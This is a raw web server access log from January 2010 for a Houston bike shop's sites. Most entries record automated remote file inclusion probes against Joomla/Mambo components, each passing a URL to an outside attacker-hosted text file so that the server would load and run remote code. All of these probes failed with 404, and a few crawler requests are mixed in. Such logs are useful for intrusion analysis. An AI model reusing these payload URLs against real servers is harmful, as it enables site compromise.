65.23.156.168 - - [11/Jan/2010:02:27:00 -0800] "GET /com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:02:27:00 -0800] "GET /logs//com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:02:27:00 -0800] "GET /logs/access.log//com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:02:28:15 -0800] "GET /com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:02:28:15 -0800] "GET /logs/access.log%20%20//com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:02:28:15 -0800] "GET /logs//com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:02:32:55 -0800] "GET /logs/access.log//com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:02:32:55 -0800] "GET /com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:02:32:55 -0800] "GET /logs//com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:02:38:14 -0800] "GET /com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:02:38:14 -0800] "GET /logs/access.log%20%20//com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:02:38:14 -0800] "GET /logs//com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:02:38:19 -0800] "GET /logs//com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:02:38:19 -0800] "GET /com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:02:38:19 -0800] "GET /logs/access.log//com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:02:40:43 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:02:40:43 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:02:40:43 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:02:45:52 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:02:45:52 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:02:45:52 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:02:47:03 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:02:47:04 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:02:47:04 -0800] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.120.144.170 - - [11/Jan/2010:02:47:34 -0800] "GET /logs/access.log%20%20//skin/zero_vote/ask_password.php?dir=http://virtualgryphon.info/wp-includes/lolid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.120.144.170 - - [11/Jan/2010:02:47:34 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://virtualgryphon.info/wp-includes/lolid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.120.144.170 - - [11/Jan/2010:02:47:34 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://virtualgryphon.info/wp-includes/lolid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:02:56:56 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.134.249.164/intranet/b1tchXs4f3.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.61 (Macintosh; I; PPC)" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:02:56:56 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.134.249.164/intranet/b1tchXs4f3.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.61 (Macintosh; I; PPC)" "houstonbikeshop.com"
65.23.156.168 - - [11/Jan/2010:02:56:56 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.134.249.164/intranet/b1tchXs4f3.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.61 (Macintosh; I; PPC)" "houstonbikeshop.com"
174.120.144.170 - - [11/Jan/2010:03:03:57 -0800] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://virtualgryphon.info/wp-includes/lolid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [11/Jan/2010:03:06:05 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [11/Jan/2010:03:06:05 -0800] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [11/Jan/2010:03:06:05 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [11/Jan/2010:03:06:18 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [11/Jan/2010:03:06:18 -0800] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [11/Jan/2010:03:06:19 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.120.14.42 - - [11/Jan/2010:03:11:07 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.120.14.42 - - [11/Jan/2010:03:11:07 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.120.14.42 - - [11/Jan/2010:03:11:07 -0800] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
75.125.222.82 - - [11/Jan/2010:03:16:21 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
75.125.222.82 - - [11/Jan/2010:03:16:21 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
75.125.222.82 - - [11/Jan/2010:03:16:21 -0800] "GET /logs/access.log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
190.24.131.38 - - [11/Jan/2010:03:18:34 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
190.24.131.38 - - [11/Jan/2010:03:18:34 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
190.24.131.38 - - [11/Jan/2010:03:18:34 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
75.125.222.82 - - [11/Jan/2010:03:19:18 -0800] "GET /logs/access.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
217.168.150.158 - - [11/Jan/2010:03:21:22 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
217.168.150.158 - - [11/Jan/2010:03:21:22 -0800] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
217.168.150.158 - - [11/Jan/2010:03:21:22 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.171.37.206 - - [11/Jan/2010:03:23:24 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "houstonbikeshop.com"
213.171.37.206 - - [11/Jan/2010:03:23:24 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "houstonbikeshop.com"
213.171.37.206 - - [11/Jan/2010:03:23:24 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "houstonbikeshop.com"
75.125.222.82 - - [11/Jan/2010:03:25:03 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
75.125.222.82 - - [11/Jan/2010:03:25:03 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
75.125.222.82 - - [11/Jan/2010:03:25:03 -0800] "GET /logs/access.log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
75.125.222.82 - - [11/Jan/2010:03:28:19 -0800] "GET /logs/access.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [11/Jan/2010:03:35:35 -0800] "GET /components/com_hashcash/server.php?mosConfig_absolute_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [11/Jan/2010:03:35:35 -0800] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [11/Jan/2010:03:35:35 -0800] "GET /logs/access.log%20%20//components/com_hashcash/server.php?mosConfig_absolute_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [11/Jan/2010:03:36:04 -0800] "GET /components/com_hashcash/server.php?mosConfig_absolute_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [11/Jan/2010:03:36:04 -0800] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [11/Jan/2010:03:36:04 -0800] "GET /logs/access.log%20%20//components/com_hashcash/server.php?mosConfig_absolute_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.195.37.114 - - [11/Jan/2010:03:52:04 -0800] "GET /bullitinboard/viewtopic.php?p=1970 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
77.88.25.28 - - [11/Jan/2010:04:01:26 -0800] "GET /tmp/ HTTP/1.1" 200 659 "-" "Yandex/1.01.001 (compatible; Win16; I)" "houstonbikeshop.com"
218.38.56.83 - - [11/Jan/2010:04:08:18 -0800] "GET /components/com_hashcash/server.php?mosConfig_absolute_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [11/Jan/2010:04:08:18 -0800] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [11/Jan/2010:04:08:18 -0800] "GET /logs/access.log%20%20//components/com_hashcash/server.php?mosConfig_absolute_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [11/Jan/2010:04:08:30 -0800] "GET /components/com_hashcash/server.php?mosConfig_absolute_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [11/Jan/2010:04:08:30 -0800] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
218.38.56.83 - - [11/Jan/2010:04:08:30 -0800] "GET /logs/access.log%20%20//components/com_hashcash/server.php?mosConfig_absolute_path=http://henry14.isfreeweb.com/zboard/id/id1.txt???%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.88.25.28 - - [11/Jan/2010:04:12:52 -0800] "GET /tmp/mailError.log HTTP/1.1" 200 4160 "-" "Yandex/1.01.001 (compatible; Win16; I)" "bicyclestoreshouston.com"
207.191.225.96 - - [11/Jan/2010:04:17:06 -0800] "GET /appserv/main.php?appserv_root=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
207.191.225.96 - - [11/Jan/2010:04:17:06 -0800] "GET /logs/access.log//appserv/main.php?appserv_root=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
207.191.225.96 - - [11/Jan/2010:04:17:08 -0800] "GET /logs//appserv/main.php?appserv_root=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
222.122.26.58 - - [11/Jan/2010:04:18:54 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ucci.zxq.net/.x/r0x-seph-id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
222.122.26.58 - - [11/Jan/2010:04:18:54 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ucci.zxq.net/.x/r0x-seph-id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
222.122.26.58 - - [11/Jan/2010:04:18:54 -0800] "GET /logs/access.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://ucci.zxq.net/.x/r0x-seph-id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
83.167.62.171 - - [11/Jan/2010:04:26:01 -0800] "GET /translations/Portuguese.txt HTTP/1.1" 200 33065 "-" "Mozilla/5.0 (compatible; Exabot/3.0 (BiggerBetter); +http://www.exabot.com/go/robot)" "svbikes.com"
207.191.225.96 - - [11/Jan/2010:04:30:09 -0800] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
207.191.225.96 - - [11/Jan/2010:04:30:09 -0800] "GET /logs//appserv/main.php?appserv_root=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
207.191.225.96 - - [11/Jan/2010:04:30:09 -0800] "GET /appserv/main.php?appserv_root=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
119.63.198.37 - - [11/Jan/2010:04:45:34 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "www.svbikes.com"
118.217.5.165 - - [11/Jan/2010:04:49:33 -0800] "GET /setup.php?dir=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
118.217.5.165 - - [11/Jan/2010:04:49:33 -0800] "GET /logs/access.log%20%20//setup.php?dir=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
118.217.5.165 - - [11/Jan/2010:04:49:33 -0800] "GET /logs//setup.php?dir=http://www.someday-store.com/shop/images/uploads/.../.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.141.91.138 - - [11/Jan/2010:04:50:32 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.o-ta.com.tw//appserv/joh1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.141.91.138 - - [11/Jan/2010:04:50:32 -0800] "GET /skin/zero_vote/error.php?dir=http://www.o-ta.com.tw//appserv/joh1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
125.141.91.138 - - [11/Jan/2010:04:50:32 -0800] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://www.o-ta.com.tw//appserv/joh1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.16.230.82 - - [11/Jan/2010:04:57:19 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.16.230.82 - - [11/Jan/2010:04:57:19 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.16.230.82 - - [11/Jan/2010:04:57:19 -0800] "GET /logs/access.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.16.230.82 - - [11/Jan/2010:04:58:20 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.16.230.82 - - [11/Jan/2010:04:58:20 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.16.230.82 - - [11/Jan/2010:04:58:20 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.16.230.82 - - [11/Jan/2010:04:58:21 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.16.230.82 - - [11/Jan/2010:04:58:21 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.16.230.82 - - [11/Jan/2010:04:58:21 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.16.230.82 - - [11/Jan/2010:04:59:57 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.16.230.82 - - [11/Jan/2010:04:59:57 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.16.230.82 - - [11/Jan/2010:04:59:57 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.16.230.82 - - [11/Jan/2010:05:00:08 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.16.230.82 - - [11/Jan/2010:05:00:08 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.16.230.82 - - [11/Jan/2010:05:00:08 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.181.7.97 - - [11/Jan/2010:05:14:33 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "www.svbikes.com"
67.195.37.114 - - [11/Jan/2010:05:15:01 -0800] "GET /tmp/?N=D HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
83.167.62.171 - - [11/Jan/2010:05:31:38 -0800] "GET /translations/?M=D HTTP/1.1" 200 3847 "-" "Mozilla/5.0 (compatible; Exabot/3.0 (BiggerBetter); +http://www.exabot.com/go/robot)" "svbikes.com"
83.167.62.171 - - [11/Jan/2010:05:31:48 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Exabot/3.0 (BiggerBetter); +http://www.exabot.com/go/robot)" "www.svbikes.com"
83.167.62.171 - - [11/Jan/2010:05:31:49 -0800] "GET /Employeesite/ HTTP/1.1" 401 - "-" "Mozilla/5.0 (compatible; Exabot/3.0 (BiggerBetter); +http://www.exabot.com/go/robot)" "www.svbikes.com"
